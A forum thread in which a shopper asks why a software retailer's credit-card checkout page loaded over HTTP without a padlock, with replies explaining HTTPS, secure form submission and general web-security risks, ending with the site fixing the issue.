Online shopping: Padlock missing from page 2/2

K

kimmage

Registered User
Messages
137
Hi there,

I went to purchase software online from a reputable company here in Ireland.

I got to the checkout stage, page one was personal details and was https, but page two (credit card info, expiry etc) was http and no padlock.

I sent an email to them asking whether or not this was a fault and they replied saying they use SSL and all pages are encrypted.

I don't believe that all pages are, especially page two of the checkout, the most important page if you ask me.

Is this correct? Should I be seeing a padlock and HTTPS on every page or are they correct saying page one having HTTPS and a padlock covered the entire transaction?

With all the online scams I don't want to risk this by chancing it, although they said unless I buy online I can't shop there...
 
If the page is properly secure you should see a padlock. There are cases however when you use other security methods (like that in versions of Actinic) where you won't see the regular browser padlock but they have a seperate warning/security reassurance becasue parts of the page are using the rarely used Secure HTTP. It is not the accepted standard like the padlock so proceed with caution.

HTTP pages are unsecure where HTTPS (S = secure) provided that the certificate attached to the HTTPS page is also valid.
If you are unhappy with the site security and what the owners are telling you then never risk it.

Is the product not available elsewhere?
 
Thanks for the reply Woodie.

I think I will have to look for it somewhere else, its just Office for Mac. I was buying it through the site because the college have an agreement with the shop for academic discounts. We were told by the IT dept to use that supplier. I don't know if I can mention them here?

I don't think I will risk it, its definitely not showing me HTTP(s) on the credit card page, it changes from S to normal HTTP when I click page 2.

I wish they allowed PayPal or something, at least their own page opens and its usually always secure.

Thanks for the reply and explaining the HTTPS thing, I wanted to make sure i wasn't being over cautious.
 
Why not query it with the site ?
If their security if flawed and they are unaware one would hope they would appreciate the info.
 
The form page that you fill in can be unsecure (HTTP) but the target page/URL to which the data is sent can be secure (HTTPS) and this is not a security problem per se. But many people expect even the form page to be secure.
 
ClubMan said:
The form page that you fill in can be unsecure (HTTP) but the target page/URL to which the data is sent can be secure (HTTPS) and this is not a security problem per se. But many people expect even the form page to be secure.
Click to expand...

Unless someone setups a MITM or Browser jacking session which captures all that data in unencrypted format.
Then there is an unnecessary exposure of sensitive data.

However, in my opinion for most hackers it is much easier to get access to data direct from hosted databases using techniques such as SQLi than it is to target an individual, hoping they will enter some sensitive data.

I do quite a bit of work in online security and it is hard to believe how some web developers manage to get away with the coding techniques they use to deliver websites to businesses/customers.

It is also even harder to believe the attitudes that website users have in relation to their own online identities. I would make a pretty good guess that 65-70% of users register on a forum/online store/wherever with their primary email address and the same password as their email. It's a pretty simple process to harvest these email / passwords from unsecure sites and then use them to access personal email accounts.

That's just for starters .....
 
nai said:
Unless someone setups a MITM or Browser jacking session which captures all that data in unencrypted format.
Then there is an unnecessary exposure of sensitive data.
Click to expand...
There's no sensitive data sent in the clear in the scenario that I outlined above. The user gets the form via an unsecure (sic.?) link, fills in the data via their browser and this (possibly sensitive data) gets submitted via a secure link. Obviously there are other risks such as keylogging etc. but that is not the focus of this thread.
 

I'm intrigued. Can you explain further please about where the encryption happens ?
 
I don't think that anybody should use that method. Better to secure both the URL from which the form is retrieved and also the URL to which the data is sent even if the former may be somewhat redundant subject to caveats such as you and that link mention...
 

Cool - thanks CM.

I was just afraid there was an uber-funky way of doing this that I haven't come across.
 
Just wanted to give a quick update here. The site acknowledged the padlock was missing from page 2 and it has now been fixed.

The entire process is secure.

Thanks to everyone for their input. I know its probably very low risk or none at all, but still I wouldn't like to have thousands or that charged to me and then claim off the bank or whatever happens when a card is fleeced/skimmed.

Cheers.
 
You must log in or register to reply here.
Menu
Log in
Register